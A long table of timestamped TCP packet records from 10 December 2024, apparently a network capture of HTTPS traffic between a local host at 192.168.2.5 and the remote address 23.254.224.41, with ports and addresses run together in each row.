                                                                                                          Dec 10, 2024 08:58:22.272665977 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.029808044 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.029977083 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.082441092 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.082468987 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.082783937 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.082894087 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.085716963 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.131336927 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.482590914 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.482620955 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.482799053 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.482822895 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.483059883 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.549683094 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.549845934 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.679055929 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.679235935 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.712384939 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.712464094 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.738404989 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.738502026 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.744432926 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.744508028 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.744520903 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.744535923 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.744586945 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.744817972 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.744817972 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.744836092 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.744878054 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.784491062 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.784522057 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:24.784595966 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.784846067 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:24.784858942 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.137329102 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.137389898 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.137873888 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.137877941 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.138086081 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.138091087 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.643831968 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.643855095 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.643891096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.643923998 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.643937111 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.643976927 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.836569071 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.836673021 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.864391088 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.864547014 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.888858080 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.888979912 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:26.922867060 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:26.923024893 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.040441036 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.040558100 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.064719915 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.064805984 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.084456921 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.084556103 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.099411011 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.099493980 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.114392042 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.114486933 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.134157896 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.134341955 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.231673956 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.231777906 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.245276928 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.245421886 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.256997108 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.257072926 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.271846056 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.271914959 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.282936096 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.283003092 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.294250011 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.294332981 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.305449963 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.305527925 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.320180893 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.320250034 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.331485033 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.331556082 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.412041903 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.412117958 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.418781996 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.418867111 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.429815054 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.429892063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.437663078 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.437763929 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.445190907 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.445282936 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.452300072 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.452383995 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.461517096 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.461587906 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.468465090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.468528986 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.472402096 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.472481966 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.476572990 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.476639032 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.481275082 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.481343031 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.486614943 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.486684084 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.490674973 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.490739107 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.494885921 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.494955063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.498944998 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.499008894 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.504257917 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.504327059 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.605711937 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.605873108 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.609180927 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.609256029 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.614761114 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.614830017 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.617925882 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.617995977 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.621984005 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.622054100 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.625437021 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.625504017 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.629324913 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.629395962 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.632808924 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.632875919 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.636034966 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.636113882 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.640324116 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.640396118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.643155098 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.643233061 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.647480965 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.647552013 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.650707006 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.650784016 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.654124975 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.654190063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.657407999 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.657474041 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.661669970 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.661745071 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.796505928 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.796590090 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.799386024 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.799448013 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.803332090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.803400993 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.806566954 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.806653023 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.810165882 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.810230970 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.812787056 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.812856913 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.817163944 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.817230940 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.820031881 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.820096016 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.823184967 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.823256969 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.826383114 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.826440096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.829885960 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.829946995 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.833086014 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.833157063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.836404085 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.836486101 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.840178967 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.840254068 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.843697071 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.843786001 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.847131968 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.847199917 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.850512981 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.850584984 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.990381002 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.990458012 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.993390083 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.993459940 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.997419119 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.997499943 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.000689030 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.000771999 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.003748894 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.003824949 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.007721901 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.007792950 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.010849953 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.010935068 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.014188051 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.014271975 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.017209053 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.017287970 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.021115065 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.021213055 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.023922920 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.023996115 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.027857065 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.027934074 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.031064987 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.031145096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.034214973 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.034292936 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.038191080 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.038269043 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.041249990 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.041328907 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.181497097 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.181601048 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.184632063 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.184699059 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.188702106 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.188782930 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.191668034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.191749096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.194905043 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.194984913 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.198903084 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.198988914 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.201997042 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.202073097 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.205517054 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.205599070 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.208343029 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.208444118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.212332010 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.212431908 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.215081930 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.215164900 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.219052076 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.219137907 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.222143888 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.222228050 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.225375891 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.225454092 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.229425907 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.229526043 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.232527018 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.232609987 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.428431034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.428512096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.548589945 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.548687935 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.639727116 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.639817953 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640151024 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640197992 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640211105 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640223026 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640258074 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640281916 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640937090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641026974 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.641036034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641088963 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.641870975 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641937971 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.642246962 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.642304897 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.642369032 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.642433882 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643280983 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643325090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643345118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643352985 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643379927 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643399000 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.644196033 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.644238949 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.644253969 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.644260883 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.644290924 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.644308090 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.645088911 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.645154953 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.645821095 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.645879984 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.646076918 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.646153927 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.647016048 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.647052050 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.647094011 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.647100925 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.647128105 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.647147894 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.647917986 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.647959948 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.647974968 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.647980928 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.648022890 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.648813963 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.648853064 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.648893118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.648899078 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.648933887 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.648950100 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.649770021 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.649818897 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.649840117 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.649846077 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.649888039 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.649920940 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.650665998 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.650722027 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.651442051 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.651504040 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.651595116 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.651650906 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.652492046 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.652525902 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.652544975 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.652551889 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.652585030 CET49837443192.168.2.523.254.224.41
